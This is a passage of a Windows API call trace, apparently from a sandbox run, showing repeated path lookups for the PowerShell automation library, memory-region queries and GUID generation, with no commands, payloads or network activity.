	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.215] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] VirtualQuery (in: lpAddress=0xcbb70, lpBuffer=0xcca30, dwLength=0x30 | out: lpBuffer=0xcca30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.216] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbde0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcbd30, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.217] VirtualQuery (in: lpAddress=0xcbb70, lpBuffer=0xcca30, dwLength=0x30 | out: lpBuffer=0xcca30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.217] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc330, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc280, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.218] VirtualQuery (in: lpAddress=0xcbb70, lpBuffer=0xcca30, dwLength=0x30 | out: lpBuffer=0xcca30*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.218] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcc640, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0412.218] VirtualQuery (in: lpAddress=0xcb260, lpBuffer=0xcc120, dwLength=0x30 | out: lpBuffer=0xcc120*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.218] VirtualQuery (in: lpAddress=0xcb2f0, lpBuffer=0xcc1b0, dwLength=0x30 | out: lpBuffer=0xcc1b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.218] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.218] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0412.530] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.531] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.531] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.531] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.532] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.532] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.533] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.533] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.534] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.534] VirtualQuery (in: lpAddress=0xcb6a0, lpBuffer=0xcc560, dwLength=0x30 | out: lpBuffer=0xcc560*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.535] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.535] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.535] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.535] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.536] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x4d1f2db9, Data2=0xbbb5, Data3=0x4709, Data4=([0]=0xb6, [1]=0x46, [2]=0x9e, [3]=0xe8, [4]=0xcd, [5]=0xad, [6]=0x7b, [7]=0x43))) returned 0x0
	[0412.536] VirtualQuery (in: lpAddress=0xcb260, lpBuffer=0xcc120, dwLength=0x30 | out: lpBuffer=0xcc120*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.536] VirtualQuery (in: lpAddress=0xcb2f0, lpBuffer=0xcc1b0, dwLength=0x30 | out: lpBuffer=0xcc1b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.536] VirtualQuery (in: lpAddress=0xcb510, lpBuffer=0xcc3d0, dwLength=0x30 | out: lpBuffer=0xcc3d0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.536] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xbf7ee4f7, Data2=0xfe10, Data3=0x4cf0, Data4=([0]=0x83, [1]=0xa9, [2]=0xf5, [3]=0x9e, [4]=0x8e, [5]=0x76, [6]=0x1e, [7]=0x65))) returned 0x0
	[0412.536] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5412ba6b, Data2=0xbdd0, Data3=0x4dde, Data4=([0]=0x98, [1]=0x4, [2]=0x54, [3]=0xaa, [4]=0x65, [5]=0xed, [6]=0x56, [7]=0x1a))) returned 0x0
	[0412.537] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0xe837f841, Data2=0xc8fb, Data3=0x4971, Data4=([0]=0x97, [1]=0x60, [2]=0x45, [3]=0xaa, [4]=0x47, [5]=0xb0, [6]=0xba, [7]=0x13))) returned 0x0
	[0412.537] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x43885561, Data2=0xed75, Data3=0x49cd, Data4=([0]=0x97, [1]=0xd3, [2]=0x68, [3]=0xb9, [4]=0xbc, [5]=0xd5, [6]=0x51, [7]=0x34))) returned 0x0
	[0412.537] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x1f6faee7, Data2=0xbd21, Data3=0x42c2, Data4=([0]=0x91, [1]=0xdb, [2]=0x34, [3]=0x9d, [4]=0x51, [5]=0xd1, [6]=0x46, [7]=0x32))) returned 0x0
	[0412.537] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x3970f3d7, Data2=0x4087, Data3=0x4a84, Data4=([0]=0xb0, [1]=0xb8, [2]=0x64, [3]=0xd1, [4]=0x5, [5]=0x5b, [6]=0x41, [7]=0x71))) returned 0x0
	[0412.537] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x802ee69a, Data2=0x5817, Data3=0x42ab, Data4=([0]=0x83, [1]=0x7e, [2]=0x5c, [3]=0x32, [4]=0x8a, [5]=0x80, [6]=0xe8, [7]=0xde))) returned 0x0
	[0412.537] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x8f25ac5c, Data2=0x5f19, Data3=0x49e0, Data4=([0]=0x95, [1]=0x8f, [2]=0xd2, [3]=0x40, [4]=0x8b, [5]=0x8e, [6]=0x69, [7]=0xaf))) returned 0x0
	[0412.538] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.538] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.538] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.538] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.538] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.538] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.538] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb0d0, lpBuffer=0xcbf90, dwLength=0x30 | out: lpBuffer=0xcbf90*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb160, lpBuffer=0xcc020, dwLength=0x30 | out: lpBuffer=0xcc020*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.539] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] VirtualQuery (in: lpAddress=0xcb9d0, lpBuffer=0xcc890, dwLength=0x30 | out: lpBuffer=0xcc890*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] VirtualQuery (in: lpAddress=0xcba60, lpBuffer=0xcc920, dwLength=0x30 | out: lpBuffer=0xcc920*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.540] CoCreateGuid (in: pguid=0xcd250 | out: pguid=0xcd250*(Data1=0x5fa9336b, Data2=0x44bf, Data3=0x460f, Data4=([0]=0xb2, [1]=0x77, [2]=0x94, [3]=0xae, [4]=0x70, [5]=0x5c, [6]=0xcc, [7]=0x62))) returned 0x0
	[0412.541] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.541] VirtualQuery (in: lpAddress=0xcb9e0, lpBuffer=0xcc8a0, dwLength=0x30 | out: lpBuffer=0xcc8a0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
	[0412.541] VirtualQuery (in: lpAddress=0xcba70, lpBuffer=0xcc930, dwLength=0x30 | out: lpBuffer=0xcc930*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0xfffff800)) returned 0x30
